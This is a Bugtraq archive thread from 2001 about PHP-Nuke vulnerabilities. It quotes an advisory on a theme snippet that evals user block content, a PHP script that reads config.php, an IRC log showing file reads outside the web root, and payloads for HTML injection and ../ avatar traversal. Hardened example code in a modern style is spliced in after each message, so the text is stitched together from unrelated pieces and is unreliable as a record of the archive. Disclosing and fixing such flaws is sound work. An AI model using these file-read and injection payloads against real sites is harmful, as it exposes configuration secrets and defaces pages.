Bugtraq mailing list archives

Re: SERIOUS BUG IN PHPNUKE


From: supergate () twlc net
Date: Fri, 27 Jul 2001 23:33:32 +0200

I don't find it a serious bug... they can just ruin their details page... so
who cares... however, if you want a serious bug in PHP-Nuke... well, there is one
that allows reading any file on the system. Look at:

http://www.twlc.net/article.php?sid=318

Mauro.
admin of twlc dot net

      bug in nuke addon@#! DANGEROUS++!!!
      Posted on Friday, July 13 @ 19:53:31 CDT
      topic: advisories
      Evening everyone..
      Sorry to tell you: PHP-Nuke addon is BUGGY. It's got a *HUGE* bug that
allows reading every file on the system. Let me explain the bug to you...

      To do active forums and shit like that the author had to put:

      echo "<tr valign=\"top\"><td bgcolor=\"#ffffff\"> ";
      // $content is the user's block text; if it names a readable file, the
      // file is opened and its contents are executed as PHP
      if (file_exists($content)) {
      $fp = fopen($content, "r");
      $content = fread($fp, filesize($content));
      fclose($fp);
      $content = "?>$content<?";
      echo eval($content);
      } else {
      echo $content;
      }
      echo "</td></tr></table> ";

      replacing

      ."<tr valign=\"top\"><td bgcolor=\"#ffffff\"> "
      ."$content "
      ."</td></tr></table> "

      ON EACH THEME file... so what does this code do? It checks the content of
the block and if this is a file it 'executes' it... now I was like 'and what if
I put something like this'

      <?php
      $db = "config.php";
      $fdb = @file($db);          // read the file into an array of lines
      $ldb = count($fdb) - 1;     // last valid index
      while ($ldb >= 0) {         // print the lines in reverse order
      echo $fdb[$ldb];
      $ldb--;
      }
      ?>
      (sorry for the code, but I am not a PHP guru :P)
      and name it exploit.php and put it in the main directory? It simply
allowed me to read config.php, but a friend of mine (shockzor, THANK YOU BRO)
told me "who could put a file like that on your webserver" (I didn't do the
test of uploading it to my anonymous FTP but I think it could work :)) but that's
just a possibility that this routine gives you, because I went ahead doing
these tests and I found that this SIMPLY ALLOWS ANY FILE READING ON THE
SYSTEM. LOOK:

      (sg|code) u got autoexec.bat under c: ?
      (shockzor) no
      (shockzor) autoexec.nt
      (sg|code) good
      (sg|code) Menu for shit
      <sg|code>
      (sg|code) lh %SystemRoot%\system32\mscdexnt.exe lh %SystemRoot%\system32\redir lh %SystemRoot%\system32\dosx
      (sg|code) now
      (sg|code) since i am
      (sg|code) 31337
      (sg|code) WHAT?
      (sg|code) EHEH
      (shockzor) i dont think you can get out of the www root
      (sg|code) u think wrong
      (sg|code) cus i just did

      well, you've got two fixes:

      1) bring back your themes file to:

      ."<tr valign=\"top\"><td bgcolor=\"#ffffff\"> "
      ."$content "
      ."</td></tr></table> "

      2) get user.php, go to the end of the file where there is:
      switch($op) {

      look down until you find

      case "edithome":
      edithome();
      break;

      case "savehome":
      savehome($uid, $uname, $theme, $storynum, $ublockon, $ublock);
      break;

      remove this shit so users can't create their "home menu"

      thanks for the attention.

      btw, I would like to thank shockzor, who helped me make the tests!
thanks bro..! :D thanks also go out to all in #twlc on undernet

      peace out

      (thanks go out also to the authors of PHP-Nuke and PHP-Nuke addon, I
run them and I like them a lot! keep up the good work)

      Mauro
      aka supergate
      root () twlc net
      http://www.twlc.net

      the following text has been posted to
      http://www.twlc.net
      http://www.phpnuke.org
      http://www.nukeaddon.com
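The advisory above boils down to one design mistake: text a user saved in a block was treated first as a filename to open and then as PHP to eval(). The following is an added example, not code from PHP-Nuke or the nuke addon, showing a replacement for the theme snippet that keeps user text as text and lets only administrator-listed block files be included. The allowlist `$ALLOWED_BLOCK_FILES`, its paths and the `render_user_block()` function are assumptions of this example.

```php
<?php
// Added example; not code from PHP-Nuke or the nuke addon. A hardened
// replacement for the theme snippet quoted above. The rule: text a user
// stored in a block is data, never a path to open and never code to eval().
// The only files that may be pulled in are those the administrator lists
// in $ALLOWED_BLOCK_FILES (constructed allowlist; the paths are hypothetical).

$ALLOWED_BLOCK_FILES = [
    'forums' => __DIR__ . '/blocks/block-Forums.php',
    'poll'   => __DIR__ . '/blocks/block-Poll.php',
];

/**
 * Render one user block.
 *  $content  - raw text the user saved through the "home menu" page.
 *  $blockKey - optional key chosen from a fixed drop-down; looked up in $allowed.
 *  $allowed  - admin-controlled map of key => absolute file path.
 */
function render_user_block(string $content, ?string $blockKey, array $allowed): string
{
    $html = '<tr valign="top"><td bgcolor="#ffffff">';

    if ($blockKey !== null) {
        // The key selects an entry; the user never supplies or influences the path.
        if (!array_key_exists($blockKey, $allowed) || !is_file($allowed[$blockKey])) {
            return $html . 'unknown block</td></tr></table>';
        }
        ob_start();
        include $allowed[$blockKey];   // fixed, admin-owned file
        $html .= ob_get_clean();
    } else {
        // Plain text is HTML-encoded, so neither markup nor PHP inside it is interpreted.
        $html .= htmlspecialchars($content, ENT_QUOTES, 'UTF-8');
    }

    return $html . '</td></tr></table>';
}

// Constructed probes modelled on the advisory: names the old code would have
// opened and executed. Here each one is rendered back as inert text.
foreach (['config.php', '../../../../autoexec.nt', 'exploit.php'] as $probe) {
    echo render_user_block($probe, null, $ALLOWED_BLOCK_FILES), "\n";
}
```

The file_exists() check in the original is the tell: a branch whose condition is "does the user's string name a file on disk" means the user controls which file is read. Removing that branch, rather than restricting which paths pass it, is what closes the hole; if a block is meant to carry links or other markup, it needs an allowlist-based HTML sanitizer in place of htmlspecialchars(), not a relaxation of the path rule.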




----- Original Message -----
From: "MegaHz" <costcon () cytanet com cy>
To: <VULN-DEV () securityfocus com>; <INCIDENTS () securityfocus com>;
<bugtraq () securityfocus com>
Cc: <mc2 () securitywire com>
Sent: Friday, July 27, 2001 4:41 PM
Subject: SERIOUS BUG IN PHPNUKE



Yes, phpnuke.org, was contacted....

First take a look at:
http://phpnuke.org/user.php?op=userinfo&uname=MegaHz


Then, read this.................
PHPnuke Bugs.

After testing just a few scripts on phpnuke I have noticed the following:

Some fields in the registration form allow code
and fail to filter out the tags.
e.g. Interests: <img src=http://www.anything.com/defaced.gif>

Also, when faking a form and posting from a local file (user.php.html),
after editing a few fields like the avatar picture for example,
it is possible to escape certain dirs with ../../../../dir/pic.gif
in the options field.

(-- This is a local html file and set to post to user.php on the target
server --)
  (no this is not a tag :P )


001.gif
002.gif



This tells user.php to save the avatar path as
http://www.target.com/../../../dir_on_server/anyfile.ext and loads the file
when the user info of the attacker is viewed.

As we know, webbugs (invisible or visible pics) can be used for tracing.

The preview of the Registration Form allows JavaScript in the
body (not the user.php) but it does not allow ' or ". BUT you can use /
instead of ', so this helps to fill in variables in JavaScript.

This can damage the site and make it look ugly.

I couldn't be bothered to look at the rest of phpnuke...


Tested on phpnuke v5.0

Firstly discovered by: dinopio



=================================================
Andreas Constantinides (MegaHz)
Owner - Admin of cHp - http://www.cyhackportal.com
megahz () cyhackportal com
ICQ#: 30136845
=================================================
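The report above describes two separate weaknesses in user.php: profile fields echoed with their HTML intact, and an avatar value accepted as a path fragment so that ../ sequences walk out of the images directory. The following is an added example, not PHP-Nuke's own code, of the two checks a maintainer would want in the save and display paths. `AVATAR_DIR` and the function names are assumptions of this example.

```php
<?php
// Added example; not PHP-Nuke's own code. Hardens the two user.php behaviours
// in the report above: profile fields rendered with their HTML intact, and an
// avatar value that walks out of the images directory with ../ sequences.
// AVATAR_DIR is a hypothetical path.

const AVATAR_DIR = '/var/www/html/images/avatars';

/**
 * Return the absolute path of an avatar, or null if the submitted value is not a
 * plain file name that resolves to an existing file inside AVATAR_DIR.
 */
function safe_avatar_path(string $submitted): ?string
{
    // First gate: only name.ext, so no slashes, no "..", no URL schemes.
    if (!preg_match('/^[A-Za-z0-9_-]+\.(gif|jpe?g|png)$/', $submitted)) {
        return null;
    }
    // Second gate: realpath() collapses symlinks; confirm the result stays inside the directory.
    $resolved = realpath(AVATAR_DIR . '/' . $submitted);
    $prefix   = realpath(AVATAR_DIR);
    if ($resolved === false || $prefix === false
        || strncmp($resolved, $prefix . DIRECTORY_SEPARATOR, strlen($prefix) + 1) !== 0) {
        return null;
    }
    return $resolved;
}

/** Encode a profile field so a submitted <img ...> or <script> is shown, not rendered. */
function profile_field_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Build the avatar <img> tag from the stored file name; fall back to a fixed default. */
function avatar_img_html(string $submitted): string
{
    $path = safe_avatar_path($submitted);
    $name = $path === null ? 'default.gif' : basename($path);
    return '<img src="images/avatars/' . rawurlencode($name) . '" alt="avatar">';
}

// Constructed inputs modelled on the report.
foreach (['../../../../dir/pic.gif', 'http://www.target.com/../../x.gif', '001.gif'] as $v) {
    echo avatar_img_html($v), "\n";
}
echo profile_field_html('<img src=http://www.anything.com/defaced.gif>'), "\n";
```

The avatar check validates the stored value rather than the form, since the report's whole point is that the form can be replaced by a local copy posting anything; the output encoding likewise covers the preview page's JavaScript case, because the / trick for avoiding quotes only matters when the field is written into the page unencoded.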

